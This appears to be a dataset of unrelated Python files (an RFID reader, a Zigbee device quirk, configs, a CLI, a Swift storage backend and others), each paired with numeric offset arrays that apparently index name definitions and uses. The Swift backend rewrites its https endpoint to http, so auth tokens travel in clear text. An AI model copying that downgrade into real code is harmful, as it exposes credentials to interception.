elif len(line) == 1 and line[0] == '\n':
new_doc = True
fout.write(u'\n')
elif in_pattern(line):
pass
else:
fout.write(line)
if __name__ == '__main__':
tic = time.time()
p = Pool(num_workers)
p.map(f, input_files)
toc = time.time()
logging.info("Processed %s in %.2f sec"%(args.input_files, toc-tic))
| [
[
[
28,
32
],
[
1851,
1855
]
],
[
[
40,
48
],
[
174,
182
]
],
[
[
56,
60
],
[
564,
568
]
],
[
[
68,
70
],
[
574,
576
]
],
[
[
78,
80
],
[
1042,
1044
],
[
1191,
1193
],
[
1314,
1316
]
],
[
[
88,
92
],
[
1831,
1835
],
[
1905,
1909
]
],
[
[
100,
107
],
[
669,
676
],
[
695,
702
],
[
709,
716
],
[
1921,
1928
]
],
[
[
115,
130
]
],
[
[
138,
163
]
],
[
[
165,
171
],
[
228,
234
],
[
362,
368
],
[
495,
501
],
[
522,
528
]
],
[
[
488,
492
]
],
[
[
515,
519
],
[
593,
597
],
[
656,
660
],
[
1962,
1966
]
],
[
[
543,
554
],
[
629,
640
],
[
1882,
1893
]
],
[
[
613,
622
],
[
763,
772
]
],
[
[
642,
653
],
[
1856,
1867
]
],
[
[
811,
827
],
[
902,
918
]
],
[
[
868,
878
],
[
1679,
1689
]
],
[
[
1016,
1017
],
[
1879,
1880
]
],
[
[
1825,
1828
],
[
1984,
1987
]
],
[
[
1847,
1848
],
[
1873,
1874
]
],
[
[
1899,
1902
],
[
1980,
1983
]
]
] |
import sys; from more_itertools import windowed, first_true
orig_data = list(map(int, open('d9.txt')))
data = orig_data[:]
target = 32321523
for i, e in enumerate(data):
if i == 0: continue
data[i] = data[i - 1] + data[i]
for i in range(len(data)):
for j in range(i):
if data[i] - data[j] == target:
print(j, i, 'inclusive')
print(min(orig_data[j:i+1]) + max(orig_data[j:i+1]))
sys.exit() | [
[
[
7,
10
],
[
435,
438
]
],
[
[
39,
47
]
],
[
[
49,
59
]
],
[
[
60,
69
],
[
110,
119
],
[
380,
389
],
[
404,
413
]
],
[
[
103,
107
],
[
163,
167
],
[
208,
212
],
[
222,
226
],
[
198,
202
],
[
250,
254
],
[
292,
296
],
[
302,
306
]
],
[
[
123,
129
],
[
313,
319
]
],
[
[
145,
146
],
[
177,
178
],
[
213,
214
],
[
227,
228
],
[
203,
204
]
],
[
[
148,
149
]
],
[
[
235,
236
],
[
277,
278
],
[
297,
298
],
[
342,
343
],
[
392,
393
],
[
416,
417
]
],
[
[
266,
267
],
[
307,
308
],
[
339,
340
],
[
390,
391
],
[
414,
415
]
]
] |
"""Xiaomi aqara single key switch device."""
import logging
from zigpy.profiles import zha
from zigpy.zcl.clusters.general import (
AnalogInput,
Basic,
Groups,
Identify,
MultistateInput,
OnOff,
Ota,
Scenes,
)
from .. import (
LUMI,
XIAOMI_NODE_DESC,
BasicCluster,
XiaomiPowerConfiguration,
XiaomiQuickInitDevice,
)
from ... import CustomCluster
from ...const import (
ATTR_ID,
COMMAND,
DEVICE_TYPE,
DOUBLE_PRESS,
ENDPOINTS,
INPUT_CLUSTERS,
LONG_PRESS,
MODELS_INFO,
NODE_DESCRIPTOR,
OUTPUT_CLUSTERS,
PRESS_TYPE,
PROFILE_ID,
SHORT_PRESS,
SKIP_CONFIGURATION,
VALUE,
ZHA_SEND_EVENT,
)
DOUBLE = "double"
HOLD = "long press"
PRESS_TYPES = {0: "long press", 1: "single", 2: "double"}
SINGLE = "single"
STATUS_TYPE_ATTR = 0x0055 # decimal = 85
XIAOMI_CLUSTER_ID = 0xFFFF
XIAOMI_DEVICE_TYPE = 0x5F01
XIAOMI_DEVICE_TYPE2 = 0x5F02
XIAOMI_DEVICE_TYPE3 = 0x5F03
_LOGGER = logging.getLogger(__name__)
class RemoteB186ACN01(XiaomiQuickInitDevice):
"""Aqara single key switch device."""
class MultistateInputCluster(CustomCluster, MultistateInput):
"""Multistate input cluster."""
cluster_id = MultistateInput.cluster_id
def __init__(self, *args, **kwargs):
"""Init."""
self._current_state = None
super().__init__(*args, **kwargs)
def _update_attribute(self, attrid, value):
super()._update_attribute(attrid, value)
if attrid == STATUS_TYPE_ATTR:
self._current_state = PRESS_TYPES.get(value)
event_args = {
PRESS_TYPE: self._current_state,
ATTR_ID: attrid,
VALUE: value,
}
self.listener_event(ZHA_SEND_EVENT, self._current_state, event_args)
# show something in the sensor in HA
super()._update_attribute(0, self._current_state)
signature = {
# <SimpleDescriptor endpoint=1 profile=260 device_type=24321
# device_version=1
# input_clusters=[0, 3, 25, 65535, 18]
# output_clusters=[0, 4, 3, 5, 25, 65535, 18]>
MODELS_INFO: [
(LUMI, "lumi.remote.b186acn01"),
(LUMI, "lumi.remote.b186acn02"),
(LUMI, "lumi.sensor_86sw1"),
],
NODE_DESCRIPTOR: XIAOMI_NODE_DESC,
ENDPOINTS: {
1: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: XIAOMI_DEVICE_TYPE,
INPUT_CLUSTERS: [
Basic.cluster_id,
Identify.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster.cluster_id,
],
OUTPUT_CLUSTERS: [
Basic.cluster_id,
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster.cluster_id,
],
},
# <SimpleDescriptor endpoint=2 profile=260 device_type=24322
# device_version=1
# input_clusters=[3, 18]
# output_clusters=[4, 3, 5, 18]>
2: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: XIAOMI_DEVICE_TYPE2,
INPUT_CLUSTERS: [
Identify.cluster_id,
MultistateInputCluster.cluster_id,
],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
MultistateInputCluster.cluster_id,
],
},
# <SimpleDescriptor endpoint=3 profile=260 device_type=24323
# device_version=1
# input_clusters=[3, 12]
# output_clusters=[4, 3, 5, 12]>
3: {
PROFILE_ID: zha.PROFILE_ID,
DEVICE_TYPE: XIAOMI_DEVICE_TYPE3,
INPUT_CLUSTERS: [Identify.cluster_id, AnalogInput.cluster_id],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
AnalogInput.cluster_id,
],
},
},
}
replacement = {
SKIP_CONFIGURATION: True,
ENDPOINTS: {
1: {
DEVICE_TYPE: zha.DeviceType.REMOTE_CONTROL,
INPUT_CLUSTERS: [
BasicCluster,
XiaomiPowerConfiguration,
Identify.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster,
],
OUTPUT_CLUSTERS: [
Basic.cluster_id,
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
Ota.cluster_id,
XIAOMI_CLUSTER_ID,
MultistateInputCluster,
OnOff.cluster_id,
],
},
2: {
DEVICE_TYPE: zha.DeviceType.REMOTE_CONTROL,
INPUT_CLUSTERS: [Identify.cluster_id, MultistateInputCluster],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
MultistateInputCluster,
],
},
3: {
DEVICE_TYPE: zha.DeviceType.REMOTE_CONTROL,
INPUT_CLUSTERS: [Identify.cluster_id, MultistateInputCluster],
OUTPUT_CLUSTERS: [
Identify.cluster_id,
Groups.cluster_id,
Scenes.cluster_id,
AnalogInput.cluster_id,
MultistateInputCluster,
],
},
},
}
device_automation_triggers = {
(DOUBLE_PRESS, DOUBLE_PRESS): {COMMAND: DOUBLE},
(SHORT_PRESS, SHORT_PRESS): {COMMAND: SINGLE},
(LONG_PRESS, LONG_PRESS): {COMMAND: HOLD},
}
| [
[
[
52,
59
],
[
980,
987
]
],
[
[
88,
91
],
[
2487,
2490
],
[
3401,
3404
],
[
4090,
4093
],
[
4606,
4609
],
[
5359,
5362
],
[
5747,
5750
]
],
[
[
137,
148
],
[
4210,
4221
],
[
4409,
4420
],
[
6031,
6042
]
],
[
[
154,
159
],
[
2606,
2611
],
[
2869,
2874
],
[
4985,
4990
]
],
[
[
165,
171
],
[
2948,
2954
],
[
3712,
3718
],
[
4331,
4337
],
[
5064,
5070
],
[
5565,
5571
],
[
5953,
5959
]
],
[
[
177,
185
],
[
2644,
2652
],
[
2907,
2915
],
[
3521,
3529
],
[
3671,
3679
],
[
4189,
4197
],
[
4290,
4298
],
[
4771,
4779
],
[
5023,
5031
],
[
5423,
5431
],
[
5524,
5532
],
[
5811,
5819
],
[
5912,
5920
]
],
[
[
191,
206
],
[
1147,
1162
],
[
1227,
1242
]
],
[
[
212,
217
],
[
5261,
5266
]
],
[
[
223,
226
],
[
2685,
2688
],
[
3026,
3029
],
[
4812,
4815
],
[
5142,
5145
]
],
[
[
232,
238
],
[
2987,
2993
],
[
3751,
3757
],
[
4370,
4376
],
[
5103,
5109
],
[
5604,
5610
],
[
5992,
5998
]
],
[
[
264,
268
],
[
2249,
2253
],
[
2294,
2298
],
[
2339,
2343
]
],
[
[
274,
290
],
[
2403,
2419
]
],
[
[
296,
308
],
[
4691,
4703
]
],
[
[
314,
338
],
[
4725,
4749
]
],
[
[
344,
365
],
[
1032,
1053
]
],
[
[
385,
398
],
[
1132,
1145
]
],
[
[
426,
433
],
[
1723,
1730
]
],
[
[
439,
446
],
[
6225,
6232
],
[
6280,
6287
],
[
6333,
6340
]
],
[
[
452,
463
],
[
2519,
2530
],
[
3433,
3444
],
[
4122,
4133
],
[
4593,
4604
],
[
5346,
5357
],
[
5734,
5745
]
],
[
[
469,
481
],
[
6195,
6207
],
[
6209,
6221
]
],
[
[
487,
496
],
[
2429,
2438
],
[
4547,
4556
]
],
[
[
502,
516
],
[
2568,
2582
],
[
3483,
3497
],
[
4172,
4186
],
[
4653,
4667
],
[
5406,
5420
],
[
5794,
5808
]
],
[
[
522,
532
],
[
6307,
6317
],
[
6319,
6329
]
],
[
[
538,
549
],
[
2221,
2232
]
],
[
[
555,
570
],
[
2386,
2401
]
],
[
[
576,
591
],
[
2830,
2845
],
[
3632,
3647
],
[
4251,
4266
],
[
4946,
4961
],
[
5485,
5500
],
[
5873,
5888
]
],
[
[
597,
607
],
[
1670,
1680
]
],
[
[
613,
623
],
[
2475,
2485
],
[
3389,
3399
],
[
4078,
4088
]
],
[
[
629,
640
],
[
6252,
6263
],
[
6265,
6276
]
],
[
[
646,
664
],
[
4513,
4531
]
],
[
[
670,
675
],
[
1760,
1765
]
],
[
[
681,
695
],
[
1828,
1842
]
],
[
[
700,
706
],
[
6234,
6240
]
],
[
[
718,
722
],
[
6342,
6346
]
],
[
[
738,
749
],
[
1596,
1607
]
],
[
[
796,
802
],
[
6289,
6295
]
],
[
[
814,
830
],
[
1540,
1556
]
],
[
[
856,
873
],
[
2721,
2738
],
[
3062,
3079
],
[
4848,
4865
],
[
5178,
5195
]
],
[
[
883,
901
],
[
2532,
2550
]
],
[
[
911,
930
],
[
3446,
3465
]
],
[
[
940,
959
],
[
4135,
4154
]
],
[
[
970,
977
]
],
[
[
1016,
1031
]
]
] |
"""
Problem:
The function 'doubler' takes a word as input.
It should create and print
a string, where each character in the string is doubled, for example:
"test" -> "tteesstt"
Tests:
>>> doubler("test")
tteesstt
>>> doubler("original")
oorriiggiinnaall
>>> doubler("hihihi")
hhiihhiihhii
"""
import doctest
def run_tests():
doctest.testmod(verbose=True)
def doubler(word):
print(''.join([char + char for char in word]))
if __name__ == "__main__":
run_tests() | [
[
[
337,
344
],
[
366,
373
]
],
[
[
349,
358
],
[
499,
508
]
],
[
[
401,
408
]
]
] |
import binascii
import sys
import Adafruit_PN532 as PN532
# Setup how the PN532 is connected to the Raspberry Pi/BeagleBone Black.
# It is recommended to use a software SPI connection with 4 digital GPIO pins.
# Configuration for a Raspberry Pi:
CS = 8 #pn532_nss----->rpi_ce0:8
MOSI = 9 #pn532_mosi---->rpi__miso:9
MISO = 10 #pn532_miso---->rpi__mosi:10
SCLK = 11 #pn532_sck----->rpi_sclk:11
# Configuration for a BeagleBone Black:
# CS = 'P8_7'
# MOSI = 'P8_8'
# MISO = 'P8_9'
# SCLK = 'P8_10'
# Create an instance of the PN532 class.
pn532 = PN532.PN532(cs=CS, sclk=SCLK, mosi=MOSI, miso=MISO)
# Call begin to initialize communication with the PN532. Must be done before
# any other calls to the PN532!
pn532.begin()
# Get the firmware version from the chip and print it out.
ic, ver, rev, support = pn532.get_firmware_version()
print('Found PN532 with firmware version: {0}.{1}'.format(ver, rev))
# Configure PN532 to communicate with MiFare cards.
pn532.SAM_configuration()
# Main loop to detect cards and read a block.
while True:
    print('Waiting for a card; hold the card near the PN532 reader...')
# Check if a card is available to read.
uid = pn532.read_passive_target()
# Try again if no card is available.
if uid is None:
continue
uid=format(binascii.hexlify(uid))
print("UID:",uid)
| [
[
[
8,
16
],
[
1277,
1285
]
],
[
[
24,
27
]
],
[
[
36,
59
],
[
561,
566
]
],
[
[
250,
252
],
[
576,
578
]
],
[
[
287,
291
],
[
596,
600
]
],
[
[
326,
330
],
[
607,
611
]
],
[
[
366,
370
],
[
585,
589
]
],
[
[
553,
558
],
[
724,
729
],
[
823,
828
],
[
974,
979
],
[
1151,
1156
]
],
[
[
799,
801
]
],
[
[
803,
806
],
[
910,
913
]
],
[
[
808,
811
],
[
915,
918
]
],
[
[
813,
820
]
],
[
[
1145,
1148
],
[
1232,
1235
],
[
1294,
1297
]
],
[
[
1266,
1269
],
[
1317,
1320
]
]
] |
from macaque import cli
def test_cli_template():
assert cli.cli() is None
| [
[
[
20,
23
],
[
61,
64
]
],
[
[
29,
46
]
]
] |
# Before anything else, install Flask: pip install flask
from flask import Flask
app = Flask(__name__)
@app.route('/')
def homepage():
    return 'This is my homepage'
@app.route('/contatos')
def contatos():
    return 'These are my contacts'
app.run() | [
[
[
75,
80
],
[
88,
93
]
],
[
[
82,
85
],
[
106,
109
],
[
174,
177
],
[
253,
256
]
],
[
[
125,
133
]
],
[
[
201,
209
]
]
] |
from itertools import zip_longest
DAY = 'day'
HOUR = 'hour'
NAME = 'name'
class Formatter:
def __init__(self, indent=5 * ' '):
self.indent = indent
def append(self, text, tag=None):
raise NotImplementedError('Must override append() in derived class')
def println(self, *args):
sep = None
for a in args:
if sep:
self.append(sep)
else:
sep = ' '
if isinstance(a, str):
self.append(a)
else:
self.append(*a)
self.append('\n')
def show(self, previous, day, hour, name, text):
if day:
if previous:
self.println()
self.println((day, DAY))
if name:
if not day:
self.println()
self.println((hour, HOUR), (name, NAME))
self.show_multiline(None, text)
else:
self.show_multiline(hour, text)
def show_multiline(self, hour, text):
hh = [(hour, HOUR)] if hour else []
for h, line in zip_longest(hh, text.split('\n'), fillvalue=self.indent):
self.println(h, line)
| [
[
[
22,
33
],
[
1091,
1102
]
],
[
[
35,
38
],
[
748,
751
]
],
[
[
47,
51
],
[
858,
862
],
[
1045,
1049
]
],
[
[
61,
65
],
[
872,
876
]
],
[
[
83,
92
]
]
] |
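The Formatter record above leaves append() abstract; the following is a minimal concrete sketch (not from the original source) showing how a subclass that simply buffers text could drive show():
class StringFormatter(Formatter):
    """Hypothetical subclass: collects appended text and ignores tags."""
    def __init__(self, indent=5 * ' '):
        super().__init__(indent)
        self.chunks = []

    def append(self, text, tag=None):
        # A GUI formatter could map `tag` (DAY/HOUR/NAME) to text styles instead.
        self.chunks.append(text)

fmt = StringFormatter()
fmt.show(previous=False, day='Monday', hour='09:00', name='standup', text='daily sync')
print(''.join(fmt.chunks), end='')  # Monday, then "09:00 standup", then the indented text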
__all__ = [
"prototype",
]
import sys
from inspect import (
signature,
)
from typing import (
TypeVar,
Callable,
)
from .exceptions import (
PrototypeError,
)
if sys.version_info >= (3, 10):
from typing import ParamSpec
else:
from typing_extensions import ParamSpec # pragma: no cover
Parameters = ParamSpec("Parameters")
ReturnType = TypeVar("ReturnType")
# noinspection PyTypeHints
def prototype(
proto: Callable[Parameters, ReturnType],
/,
*,
runtime: bool = True,
) -> Callable[Parameters, ReturnType]:
"""
Prototype decorator acts like a type protection shield
that validates the parameters specification and return
type annotation of the function against given prototype.
    If the `runtime` parameter is set to True, the decorator performs
    prototype validation at runtime using the :class:`Signature`
    class from the :mod:`inspect` module by comparing the function and
    prototype signatures against each other.
:param proto: prototype function
:param runtime: when set to True, performs prototype validation during runtime
:raises PrototypeError:
When function has incompatible signature for given prototype.
Exception is raised only when `runtime` argument is set to True.
"""
# noinspection PyTypeHints
def decorator(func: Callable[Parameters, ReturnType], /) -> Callable[Parameters, ReturnType]:
if runtime is True:
func_signature = signature(func)
proto_signature = signature(proto)
if func_signature.parameters != proto_signature.parameters:
raise PrototypeError(func, func_signature, proto, proto_signature)
if func_signature.return_annotation != proto_signature.return_annotation:
raise PrototypeError(func, func_signature, proto, proto_signature)
return func
return decorator
| [
[
[
0,
7
]
],
[
[
39,
42
],
[
187,
190
]
],
[
[
70,
79
],
[
1478,
1487
],
[
1524,
1533
]
],
[
[
109,
116
],
[
370,
377
]
],
[
[
122,
130
],
[
526,
534
],
[
447,
455
],
[
1387,
1395
],
[
1347,
1355
]
],
[
[
165,
179
],
[
1636,
1650
],
[
1806,
1820
]
],
[
[
239,
248
],
[
333,
342
]
],
[
[
289,
298
],
[
333,
342
]
],
[
[
320,
330
],
[
535,
545
],
[
456,
466
],
[
1396,
1406
],
[
1356,
1366
]
],
[
[
357,
367
],
[
547,
557
],
[
468,
478
],
[
1408,
1418
],
[
1368,
1378
]
],
[
[
425,
434
]
]
] |
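A hedged usage sketch for the prototype decorator defined above (assuming `prototype` and `PrototypeError` are importable from that module; the function names are illustrative):
def greet_proto(name: str) -> str:
    ...

@prototype(greet_proto)
def greet(name: str) -> str:
    return f"Hello, {name}!"

print(greet("world"))  # Hello, world!

# With runtime=True (the default) an incompatible signature fails at decoration time:
# @prototype(greet_proto)
# def bad(name: int) -> str: ...   # raises PrototypeError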
import PIL.Image
from io import BytesIO
from IPython.display import clear_output, Image, display
import numpy as np
def showarray(a, fmt='jpeg'):
a = np.uint8(np.clip(a, 0, 255))
f = BytesIO()
PIL.Image.fromarray(a).save(f, fmt)
display(Image(data=f.getvalue()))
def showtensor(a):
mean = np.array([0.485, 0.456, 0.406]).reshape([1, 1, 3])
std = np.array([0.229, 0.224, 0.225]).reshape([1, 1, 3])
inp = a[0, :, :, :]
inp = inp.transpose(1, 2, 0)
inp = std * inp + mean
inp *= 255
showarray(inp)
clear_output(wait=True)
| [
[
[
7,
16
],
[
207,
210
]
],
[
[
32,
39
],
[
193,
200
]
],
[
[
68,
80
],
[
547,
559
]
],
[
[
82,
87
],
[
255,
260
]
],
[
[
89,
96
],
[
247,
254
]
],
[
[
104,
115
],
[
156,
158
],
[
165,
167
],
[
313,
315
],
[
374,
376
]
],
[
[
122,
131
],
[
528,
537
]
],
[
[
287,
297
]
]
] |
import mimetypes
from pathlib import Path
from appdirs import user_config_dir
from tqdm import tqdm
NAME = "novelsave"
AUTHOR = "Mensch272"
# base project directory
BASE_DIR = Path(__file__).resolve().parent.parent
STATIC_DIR = BASE_DIR / "novelsave/resources"
# operating system specific configuration file
# config directory is used to place logs, config, cache
CONFIG_DIR = Path(user_config_dir(NAME, AUTHOR))
CONFIG_FILE = CONFIG_DIR / "config.json"
DATA_DIR = CONFIG_DIR / "data"
DATABASE_FILE = (CONFIG_DIR / "data.sqlite").resolve()
DATABASE_URL = "sqlite:///" + str(DATABASE_FILE)
# default novel directory, where packaged files such
# as epub and pdf are stored.
NOVEL_DIR = Path.home() / "novels"
# the following map defines how files are stored
# by further subdivision into sub-folders
DIVISION_RULES = {
k: v.split("/", maxsplit=1)[0] for k, v in mimetypes.types_map.items()
}
def console_formatter(record):
if record["level"].name == "INFO":
return "{message}\n"
else:
return "<level>{level}: {message}</level>\n"
LOGGER_CONFIG = {
"handlers": [
{
"sink": lambda msg: tqdm.write(msg, end=""),
"format": console_formatter,
"level": "INFO",
"colorize": True,
"backtrace": False,
"diagnose": False,
},
{
"sink": CONFIG_DIR / "logs" / "{time}.log",
"level": "TRACE",
"retention": "2 days",
"compression": "zip",
"encoding": "utf-8",
},
],
}
TQDM_CONFIG = {"ncols": 80, "bar_format": "{percentage:3.0f}% |{bar}{r_bar}"}
config = {
"name": NAME,
"author": AUTHOR,
"base_dir": BASE_DIR,
"static": {
"dir": STATIC_DIR,
},
"config": {
"dir": CONFIG_DIR,
"file": CONFIG_FILE,
},
"data": {
"dir": DATA_DIR,
"division_rules": DIVISION_RULES,
},
"novel": {
"dir": NOVEL_DIR,
},
"infrastructure": {
"database": {
"url": DATABASE_URL,
}
},
}
| [
[
[
7,
16
],
[
873,
882
]
],
[
[
37,
41
],
[
179,
183
],
[
382,
386
],
[
692,
696
]
],
[
[
63,
78
],
[
387,
402
]
],
[
[
96,
100
],
[
1147,
1151
]
],
[
[
102,
106
],
[
403,
407
],
[
1667,
1671
]
],
[
[
121,
127
],
[
409,
415
],
[
1687,
1693
]
],
[
[
168,
176
],
[
232,
240
],
[
1711,
1719
]
],
[
[
219,
229
],
[
1752,
1762
]
],
[
[
369,
379
],
[
432,
442
],
[
471,
481
],
[
509,
519
],
[
1376,
1386
],
[
1802,
1812
]
],
[
[
418,
429
],
[
1830,
1841
]
],
[
[
460,
468
],
[
1879,
1887
]
],
[
[
492,
505
],
[
581,
594
]
],
[
[
547,
559
],
[
2051,
2063
]
],
[
[
680,
689
],
[
1968,
1977
]
],
[
[
807,
821
],
[
1915,
1929
]
],
[
[
909,
926
],
[
1194,
1211
]
],
[
[
1069,
1082
]
],
[
[
1565,
1576
]
],
[
[
1644,
1650
]
]
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import os
import sys
import click
from newschimp import renderer, sender
from newschimp.social import fb, gg, lanyrd
from newschimp.cli import cli_group
from newschimp.utils import ComplexCLI, load_settings
LOGGER = logging.getLogger(__name__)
def create_newsletter(settings):
"""Newsletter creation based on config and env variables"""
context = {}
try:
fb_posts = fb.get_posts(settings, os.environ['FACEBOOK_TOKEN'], None)
except KeyError:
LOGGER.error('Facebook Token not defined')
sys.exit()
click.echo('[1/4] Getting Facebook Group posts')
context['fb'] = fb.curate(fb_posts)
ggroup_posts = gg.get_posts(settings, None)
click.echo('[2/4] Getting Google Group posts')
context['gg'] = gg.curate(ggroup_posts)
click.echo('[3/4] Getting upcoming Lanyrd meetups')
context['meetups'] = lanyrd.meetup_loop(settings)
click.echo('[4/4] Rendering mail')
renderer.render_files(settings, None, context)
click.confirm(
'Content is rendered, would you like to send it now?', abort=True)
click.echo('Creating MailChimp campaign')
sender.new_campaign(settings, os.environ.get('MAILCHIMP_KEY'))
cli_group.add_command(fb.cli)
cli_group.add_command(gg.cli)
cli_group.add_command(lanyrd.cli)
@cli_group.command(cls=ComplexCLI, invoke_without_command=True)
@click.option('--config', help='Custom config file', type=click.Path(
exists=True, file_okay=True, resolve_path=True), default='config.yaml')
@click.pass_context
def main(ctx, config):
ctx.obj['SETTINGS'] = load_settings(config)
if ctx.invoked_subcommand is None:
create_newsletter(ctx.obj['SETTINGS'])
if __name__ == '__main__':
main(obj={})
| [
[
[
53,
60
],
[
280,
287
]
],
[
[
68,
70
],
[
475,
477
],
[
1212,
1214
]
],
[
[
78,
81
],
[
591,
594
]
],
[
[
90,
95
],
[
1407,
1412
],
[
1464,
1469
],
[
1553,
1558
],
[
606,
611
],
[
747,
752
],
[
842,
847
],
[
952,
957
],
[
1042,
1047
],
[
1136,
1141
]
],
[
[
119,
127
],
[
991,
999
]
],
[
[
129,
135
],
[
1182,
1188
]
],
[
[
165,
167
],
[
1269,
1271
],
[
452,
454
],
[
675,
677
]
],
[
[
169,
171
],
[
1299,
1301
],
[
714,
716
],
[
814,
816
]
],
[
[
173,
179
],
[
1329,
1335
],
[
919,
925
]
],
[
[
206,
215
],
[
1247,
1256
],
[
1277,
1286
],
[
1307,
1316
],
[
1343,
1352
]
],
[
[
244,
254
],
[
1365,
1375
]
],
[
[
256,
269
],
[
1621,
1634
]
],
[
[
271,
277
],
[
540,
546
]
],
[
[
314,
331
],
[
1690,
1707
]
],
[
[
1576,
1580
],
[
1762,
1766
]
]
] |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
PACKAGE = "flightaware"
NAME = "flightaware"
DESCRIPTION = "A python REST interface for flightaware data"
AUTHOR = "Fred Palmer"
AUTHOR_EMAIL = "fred.palmer@gmail.com"
URL = "https://github.com/fredpalmer/flightaware"
config = {
"description": DESCRIPTION,
"author": AUTHOR,
"url": URL,
"author_email": AUTHOR_EMAIL,
"version": "0.1",
"install_requires": [
"requests>=2.0.0",
"pytz"
],
"keywords": "travel flightaware airline flight flight-tracking flight-data",
"classifiers": [
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Internet :: WWW/HTTP",
],
"packages": [PACKAGE, ],
"scripts": [],
"name": NAME,
"license": "MIT",
}
setup(**config)
| [
[
[
32,
37
],
[
1028,
1033
]
],
[
[
89,
94
],
[
1028,
1033
]
],
[
[
96,
103
],
[
954,
961
]
],
[
[
120,
124
],
[
997,
1001
]
],
[
[
141,
152
],
[
345,
356
]
],
[
[
202,
208
],
[
372,
378
]
],
[
[
225,
237
],
[
416,
428
]
],
[
[
264,
267
],
[
391,
394
]
],
[
[
315,
321
],
[
1036,
1042
]
]
] |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 30, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12); | [
[
[
7,
37
]
],
[
[
45,
95
],
[
100,
103
]
]
] |
#
# (C) Copyright IBM Corp. 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import shutil
import logging
import requests
from lithops.storage.utils import StorageNoSuchKeyError
from lithops.utils import sizeof_fmt
from lithops.constants import STORAGE_CLI_MSG
logger = logging.getLogger(__name__)
class StorageBackend:
"""
    A wrapper around OpenStack Swift APIs.
"""
def __init__(self, swift_config):
logger.debug("Creating OpenStack Swift client")
self.auth_url = swift_config['swift_auth_url']
self.user_id = swift_config['swift_user_id']
self.project_id = swift_config['swift_project_id']
self.password = swift_config['swift_password']
self.region = swift_config['swift_region']
self.endpoint = None
if 'token' in swift_config:
self.token = swift_config['token']
self.endpoint = swift_config['endpoint']
else:
self.token = self.generate_swift_token()
swift_config['token'] = self.token
swift_config['endpoint'] = self.endpoint
self.session = requests.session()
self.session.headers.update({'X-Auth-Token': self.token})
adapter = requests.adapters.HTTPAdapter(pool_maxsize=64, max_retries=3)
self.session.mount('http://', adapter)
self.session.mount('https://', adapter)
msg = STORAGE_CLI_MSG.format('OpenStack Swift')
logger.info("{} - Region: {}".format(msg, self.region))
def generate_swift_token(self):
"""
Generates new token for accessing to Swift.
:return: token
"""
url = self.auth_url+"/v3/auth/tokens"
headers = {'Content-Type': 'application/json'}
data = {"auth": {"identity": {"methods": ["password"],
"password": {"user": {"id": self.user_id, "password": self.password}}},
"scope": {"project": {"id": self.project_id}}}}
json_data = json.dumps(data)
r = requests.post(url, data=json_data, headers=headers)
if r.status_code == 201:
backend_info = json.loads(r.text)
for service in backend_info['token']['catalog']:
if service['name'] == 'swift':
for endpoint in service['endpoints']:
if endpoint['region'] == self.region:
if endpoint['interface'] == 'public':
self.endpoint = endpoint['url'].replace('https:', 'http:')
if not self.endpoint:
raise Exception('Invalid region name')
return r.headers['X-Subject-Token']
else:
message = json.loads(r.text)['error']['message']
raise Exception("{} - {} - {}".format(r.status_code, r.reason, message))
def put_object(self, container_name, key, data):
"""
Put an object in Swift. Override the object if the key already exists.
:param key: key of the object.
:param data: data of the object
:type data: str/bytes
:return: None
"""
url = '/'.join([self.endpoint, container_name, key])
try:
res = self.session.put(url, data=data)
status = 'OK' if res.status_code == 201 else 'Error'
try:
logger.debug('PUT Object {} - Size: {} - {}'.format(key, sizeof_fmt(len(data)), status))
except Exception:
logger.debug('PUT Object {} - {}'.format(key, status))
except Exception as e:
print(e)
def get_object(self, container_name, key, stream=False, extra_get_args={}):
"""
Get object from Swift with a key. Throws StorageNoSuchKeyError if the given key does not exist.
:param key: key of the object
:return: Data of the object
:rtype: str/bytes
"""
if not container_name:
container_name = self.storage_container
url = '/'.join([self.endpoint, container_name, key])
headers = {'X-Auth-Token': self.token}
headers.update(extra_get_args)
try:
res = self.session.get(url, headers=headers, stream=stream)
if res.status_code == 200 or res.status_code == 206:
if stream:
data = res.raw
else:
data = res.content
return data
elif res.status_code == 404:
raise StorageNoSuchKeyError(container_name, key)
else:
raise Exception('{} - {}'.format(res.status_code, key))
except StorageNoSuchKeyError:
raise StorageNoSuchKeyError(container_name, key)
except Exception as e:
print(e)
raise StorageNoSuchKeyError(container_name, key)
def upload_file(self, file_name, bucket, key=None, extra_args={}):
"""Upload a file
:param file_name: File to upload
:param bucket: Bucket to upload to
:param key: S3 object name. If not specified then file_name is used
:return: True if file was uploaded, else False
"""
# If S3 key was not specified, use file_name
if key is None:
key = os.path.basename(file_name)
# Upload the file
try:
with open(file_name, 'rb') as in_file:
self.put_object(bucket, key, in_file)
except Exception as e:
logging.error(e)
return False
return True
def download_file(self, bucket, key, file_name=None, extra_args={}):
"""Download a file
:param bucket: Bucket to download from
:param key: S3 object name. If not specified then file_name is used
:param file_name: File to upload
:return: True if file was downloaded, else False
"""
